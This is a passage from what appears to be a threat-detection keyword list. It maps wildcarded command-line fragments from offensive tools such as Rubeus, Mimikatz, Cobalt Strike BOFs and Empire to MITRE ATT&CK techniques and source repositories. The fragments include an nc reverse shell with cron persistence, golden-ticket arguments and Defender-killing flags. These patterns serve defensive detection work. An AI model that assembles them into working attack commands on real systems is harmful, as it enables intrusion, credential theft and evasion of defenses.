Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* .beacon_keys -*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -* /.exegol/*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* /altservice:ldap *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /asrepkey*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /bin/nc * -e /bin/bash* > cron && crontab cron*,greyware_tool_keyword,nc,Linux Persistence Shell cron,T1053 - T1037,TA0003,N/A,N/A,Persistence,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -* /bin/nc * -e /bin/bash*> * crontab cron*,greyware_tool_keyword,nc,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -* /c sc query WinDefend*,greyware_tool_keyword,sc,Get information about Windows Defender service,T1518.001 - T1049,TA0007 - 
TA0009,N/A,N/A,Discovery,https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* /cmdtech:* /cmd:* /impuser:*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,0,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -* /cmdtech:* /cmd:* /query:*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,0,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -* /createnetonly:*cmd.exe*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /createnetonly:*cmd.exe*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /credpassword*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /creduser:* /credpassword:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /impersonateuser:* /msdsspn:* /ptt*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ldap * /printcmd*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ldapfilter:'admincount=1'*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /modules:* /target:* /linkedsql:*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,0,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -* /NAME:* /KILL*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -* /nofullpacsig *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /outfile:* /spn:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /outfile:* /spns:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /PID:* /DRIVER:*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -* /PID:* /KILL*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -* /pwdsetafter:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /pwdsetbefore:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /rc4opsec *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /s4uproxytarget*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /s4utransitedservices*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /service:krbtgt *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /simple * /spn*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ticket *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ticket:* /autoenterprise *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ticket:*.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /user:* /domain:* /aes256:* /run:powershell.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* /user:* /domain:* /ntlm:* /run:powershell.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory),T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection),T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* /usetgtdeleg *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* \Temp\blah.exe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* | Find-AmsiSignatures*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool 
for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* | Test-ContainsAmsiSignatures*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* > \\127.0.0.1\ADMIN$\__* 2>&1,offensive_tool_keyword,malware,Destructive Malware targeting organizations,T1486 T1059,TA0008,N/A,N/A,Ransomware,https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* > Wi-Fi-PASS*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* 0.0.0.0:8080 --threads*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -* 1.2.3.4:8080*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,0,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -* 4444 meter,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
